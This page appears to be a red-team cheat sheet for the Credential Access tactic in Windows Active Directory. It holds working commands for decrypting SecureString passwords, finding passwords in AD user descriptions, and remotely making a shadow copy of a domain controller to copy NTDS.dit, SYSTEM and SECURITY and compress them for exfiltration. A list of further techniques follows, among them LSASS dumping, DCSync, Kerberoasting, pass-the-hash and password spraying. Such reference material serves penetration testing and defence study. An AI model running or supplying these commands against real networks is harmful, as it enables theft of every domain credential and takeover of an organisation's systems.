Credential Access
The adversary is trying to steal account names and passwords. https://attack.mitre.org/tactics/TA0006/
SecureString to Plaintext
$SecPass = "<SECURE PASS STRING>" | ConvertTo-SecureString;
(New-Object System.Management.Automation.PSCredential "N/A", $SecPass).GetNetworkCredential().Password; Passwords in Description
Get-ADUser -Filter 'Description -like "*password*"' -Properties Description | select name,DescriptionFind-UserField -SearchField Description -SearchTerm "password"Volume Shadow Creation
# creating volume shadow copy
wmic /node:"[AD_IP_address]" /user:"[username]" /password:"[password]" process call create "cmd /c vssadmin create shadow /for=C: 2>&1"
# copying NTDS.dit, SYSTEM and SECURITY files from shadow copy
wmic /node:"[AD_IP_address]" /user:"[username]" /password:"[password]" process call create "cmd /c copy \\[shadow_copy_dir]\\Windows\\NTDS\\NTDS.dit [target_folder] & copy \\[shadow_copy_dir]\\Windows\\System32\\config\\SYSTEM [target_folder] & copy \\[shadow_copy_dir]\\Windows\\System32\\config\\SECURITY [target_folder]"
# compressing files for exfiltration
7za.exe a -mx3 nt.7z \\\\[AD_IP_address]\\c$\\[target_folder]Stored Credential Enumeration
Dumping LSASS with rundll32.exe
rundll32.exeMemory Dump with Get-StorageDiagnosticInfo
Get-StorageDiagnosticInfoMount VHD, pull SAM
Targeted Kerberoasting with PowerSploit
Dumping NTDS with ntdsutil.exe
ntdsutil.exeDSInternals
DCSync with Get-ADReplAccount
Get-ADReplAccountExtracting from NTDS, SYSTEM, SECURITY
Extracting NTDS with ntdsutil.exe
ntdsutil.exeImpacket
GetUserSPNs.py
GetNPUsers.py
secretsdump.py
Extracting Credentials Remotely
Offline NTDS Cracking
Resetting Credentials with smbpasswd.py
NetExec
Pass-the-Hash
SMB Password Spraying
Dumping Remote PowerShell History
Extracting Credentials
Relaying to DCSync
Last updated